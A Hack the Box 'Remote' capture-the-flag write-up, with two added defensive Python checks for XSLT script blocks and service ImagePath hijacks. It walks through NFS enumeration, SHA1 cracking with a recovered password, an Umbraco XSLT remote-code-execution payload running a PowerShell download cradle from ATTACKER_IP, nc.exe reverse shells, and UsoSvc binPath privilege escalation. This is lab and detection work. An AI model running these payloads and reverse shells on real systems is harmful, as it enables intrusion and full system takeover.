Hack the Box — Remote write-up by fcmunhoz
This is my first write-up. At the time I am writing this article, Remote is the newest Windows machine, released last week. There is only one more machine left for me to complete the "easy" list. I say "easy" because I had to learn a lot of new tools, read a lot of write-ups and watch videos on YouTube to get the skills to finish these machines.
Initial Foothold
Let's scan to see which services are running and on which ports.
nmap -sV -sC -Pn --min-rate 1000 --max-rate 5000 10.10.10.180
- -sV: Detect service version
- -sC: Script Scan
- -Pn: Treat all hosts as online
- --min-rate: Send packets no slower than <number> per second
- --max-rate: Send packets no faster than <number> per second
FTP
The first service running is an FTP daemon. Does it allow anonymous login?
ftp 10.10.10.180
username: anonymous
password: anonymous
The user anonymous was logged in successfully. However, listing the directory returned zero files.
Web server
The next service is a web server running on port 80. We can browse the website; I followed the "contact" menu route and clicked on the "Install Forms" button.
I was redirected to an Umbraco CMS login page.
I know most VMs on HackTheBox don't require a brute-force tool like Hydra to force a login, or DirBuster to discover new directories and pages.
User 1
Here we enumerate our next service, rpcbind on port 111. These are useful commands:
rpcinfo -p 10.10.10.180
- -p: Probe the portmapper on the host and list all registered RPC programs
showmount -e 10.10.10.180
- -e: Show the NFS server’s export list
A very important folder is exported by the service. We mount the folder on our machine.
mount 10.10.10.180:/site_backups /mnt/tmp
ls -l /mnt/tmp
After a lot of enumeration and some research on Google, I found the Umbraco CMS config file (Umbraco.sdf) inside the App_Data folder. The best way to read this file is with a tool called strings.
strings Umbraco.sdf
As we can see in the content of the file, in order, there is a hash, its type (SHA1), and the username admin@htb.local.
John the Ripper
The tool I usually use to break hashes is John the Ripper together with the rockyou.txt dictionary.
./john --wordlist=/tmp/rockyou.txt /tmp/hash --format=raw-sha1
- --wordlist: a custom dictionary you have.
- --format: hash type.
After a few seconds the password was found, and we have the credentials.
Username: admin@htb.local
Password: baconandcheese
Exploitdb
A few steps ago, when I was searching on Google for the Umbraco CMS configuration, I also found a script on Exploit-DB that gives remote code execution if you have the credentials.
This script is a PoC that executes calc.exe. We need to modify it to execute the right commands.
Change the content of the variable cmd to a PowerShell command that downloads a reverse shell:
string cmd = " /C powershell.exe -nop -ep bypass -c IEX((New-Object Net.WebClient).DownloadString(\'http://ATTACKER_IP:8080/reverse.ps1\'))";
Change the executable file calc.exe to cmd.exe:
proc.StartInfo.FileName = "cmd.exe";
Payload
The final payload will be:
payload = '<?xml version="1.0"?><xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:csharp_user="http://csharp.mycompany.com/mynamespace"><msxsl:script language="C#" implements-prefix="csharp_user">public string xml() { string cmd = " /C powershell.exe -nop -ep bypass -c IEX((New-Object Net.WebClient).DownloadString(\'http://ATTACKER_IP:8080/reverse.ps1\'));"; System.Diagnostics.Process proc = new System.Diagnostics.Process(); proc.StartInfo.FileName = "cmd.exe"; proc.StartInfo.Arguments = cmd; proc.StartInfo.UseShellExecute = false;proc.StartInfo.RedirectStandardOutput = true; proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } </msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/> </xsl:template> </xsl:stylesheet>';
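From the defender's side, this payload only works because the XSLT engine compiles the embedded msxsl:script block and then lets the template call it as an extension function. As an added example (not from the write-up or from Umbraco), the Python pre-check below refuses any stylesheet that carries a script block or calls a prefixed extension function before it reaches a transform; both sample stylesheets are constructed, and the script body launches the original PoC's calc.exe rather than a real command.

```python
import re
import xml.etree.ElementTree as ET

MSXSL_NS = "urn:schemas-microsoft-com:xslt"   # namespace of <msxsl:script>
# XPath function call through a namespace prefix, e.g. csharp_user:xml()
EXT_CALL = re.compile(r"\b([A-Za-z_][\w.\-]*):([A-Za-z_][\w.\-]*)\s*\(")


def audit_xslt(xslt_text):
    """Return the list of reasons this stylesheet must not be compiled (empty = clean)."""
    findings = []
    root = ET.fromstring(xslt_text)
    for elem in root.iter():
        if elem.tag == "{%s}script" % MSXSL_NS:
            findings.append("msxsl:script block language=%r implements-prefix=%r"
                            % (elem.get("language"), elem.get("implements-prefix")))
            if "System.Diagnostics.Process" in (elem.text or ""):
                findings.append("script body starts a process via System.Diagnostics.Process")
        # Extension-function calls hide in XPath expressions, not in element names.
        for attr in ("select", "test"):
            value = elem.get(attr)
            if value:
                for prefix, func in EXT_CALL.findall(value):
                    findings.append("extension function call %s:%s() in %s attribute"
                                    % (prefix, func, attr))
    return findings


# Constructed samples: the PoC structure from the write-up (harmless body) and a clean stylesheet.
SCRIPT_PAYLOAD = (
    '<?xml version="1.0"?>'
    '<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"'
    ' xmlns:msxsl="urn:schemas-microsoft-com:xslt"'
    ' xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">'
    '<msxsl:script language="C#" implements-prefix="csharp_user">'
    'public string xml() { System.Diagnostics.Process proc = new System.Diagnostics.Process();'
    ' proc.StartInfo.FileName = "calc.exe"; proc.Start(); return "done"; }'
    '</msxsl:script>'
    '<xsl:template match="/"><xsl:value-of select="csharp_user:xml()"/></xsl:template>'
    '</xsl:stylesheet>'
)
BENIGN = (
    '<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">'
    '<xsl:template match="/"><xsl:value-of select="count(//item)"/></xsl:template>'
    '</xsl:stylesheet>'
)

if __name__ == "__main__":
    for name, doc in (("payload", SCRIPT_PAYLOAD), ("benign", BENIGN)):
        print(name, "->", audit_xslt(doc) or "clean")
```

The equivalent server-side fix in .NET is to compile stylesheets with script support disabled; this check is the portable version you can run over stored templates.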
Prepare Reverse Shell
Before we execute the script, we need to configure reverse.ps1 and serve the file so it can be downloaded.
You can download the reverse shell on this link:
https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1
Edit the script and change the first line to the attacker IP and the port you want the connection to come back on.
Serving Reverse Shell
Start a webserver on the same directory the reverse.ps1 file is.
python -m SimpleHTTPServer 8080
Netcat
Open an nc listener on the port you configured in reverse.ps1:
nc -nlvp 4444
Now we execute the exploit:
python 46153.py
The connection was successfully established and we have a shell.
If we list the Users folder, there is a directory called Public; we have access to it, and the user.txt flag is there.
Root
We start a new nc listener; this time I used port 4449.
nc -nlvp 4449
We need to download nc.exe onto the victim machine.
We change the same script we used to download reverse.ps1, but now fetching nc.exe.
Don't forget to google and download nc.exe into the same directory that the web server on port 8080 is serving.
cmd.exe /C powershell.exe -nop -ep bypass -c "(New-Object System.Net.WebClient).DownloadFile('http://ATTACKER_IP:8080/nc.exe', 'C:\Users\Public\nc.exe')";
Let's execute this command to open another shell:
C:\Users\Public\nc.exe ATTACKER_IP 4449 -e C:\WINDOWS\System32\cmd.exe
Now we have another shell in which we can read the output of our commands.
What services are running?
tasklist /svc
We found a service that can be abused: UsoSvc
Query the service
sc qc UsoSvc
Modify the binary path to open an nc connection with Administrator privileges, but first we need to stop the service.
Change binpath
sc.exe config UsoSvc binPath="C:\Windows\System32\spool\drivers\color\nc.exe ATTACKER_IP 4448 -e cmd.exe"
Copy the nc.exe to the directory:
C:\Windows\System32\spool\drivers\color\nc.exe
Start a new nc listener on port 4448
nc -nlvp 4448
Then start the service again
sc start UsoSvc
I had some failures starting the service:
[SC] StartService FAILED 1053:
But after a reset of the machine, I was successfully connected as Administrator.
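The UsoSvc step succeeds because the service's configuration could be rewritten by a low-privileged user and because C:\Windows\System32\spool\drivers\color is writable by ordinary users. As an added detection example (not from the write-up), the Python snippet below audits Sysmon Event ID 13 records (registry value set) for changes to a service's ImagePath that land in a user-writable directory, spawn a shell, or leave the system directories; the events are constructed, and the field names follow Sysmon's schema.

```python
import re

# Sysmon Event ID 13 (RegistryEvent, value set) records, constructed for this example.
SAMPLE_EVENTS = [
    {"EventID": 13,  # legitimate UsoSvc image, as Windows ships it
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\UsoSvc\\ImagePath",
     "Details": "%systemroot%\\system32\\svchost.exe -k netsvcs -p"},
    {"EventID": 13,  # the rewrite performed in the write-up
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\UsoSvc\\ImagePath",
     "Details": "C:\\Windows\\System32\\spool\\drivers\\color\\nc.exe ATTACKER_IP 4448 -e cmd.exe"},
    {"EventID": 13,  # unrelated value under the same key: start type change
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\SomeSvc\\Start",
     "Details": "DWORD (0x00000003)"},
]

SERVICE_IMAGE = re.compile(
    r"^HKLM\\System\\CurrentControlSet\\Services\\([^\\]+)\\ImagePath$", re.I)
# Directories under %SystemRoot% that standard users can write to by default.
USER_WRITABLE = ("c:\\windows\\system32\\spool\\drivers\\color\\",
                 "c:\\windows\\tasks\\", "c:\\windows\\tracing\\", "c:\\windows\\temp\\")
SYSTEM_ROOTS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
                "c:\\program files", "\"c:\\program files")
# netcat-style "-e cmd.exe" / "-e powershell" argument that hands out a shell
SHELL_ARGS = re.compile(r"\s-e\s+\S*(cmd|powershell)(\.exe)?\b", re.I)


def audit_image_path_changes(events):
    """Return (service, [reasons]) for every ImagePath write that looks like a hijack."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 13:
            continue
        match = SERVICE_IMAGE.match(ev["TargetObject"])
        if not match:
            continue
        service = match.group(1)
        new_path = ev["Details"].lower().replace("%systemroot%", "c:\\windows")
        reasons = []
        if new_path.startswith(USER_WRITABLE):
            reasons.append("binary in user-writable directory")
        if SHELL_ARGS.search(new_path):
            reasons.append("arguments spawn a shell (netcat -e style)")
        if not new_path.startswith(SYSTEM_ROOTS):
            reasons.append("binary outside system/program directories")
        if reasons:
            alerts.append((service, reasons))
    return alerts


if __name__ == "__main__":
    for service, reasons in audit_image_path_changes(SAMPLE_EVENTS):
        print(service, "->", "; ".join(reasons))
```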
Thanks for reading,
Filipe Munhoz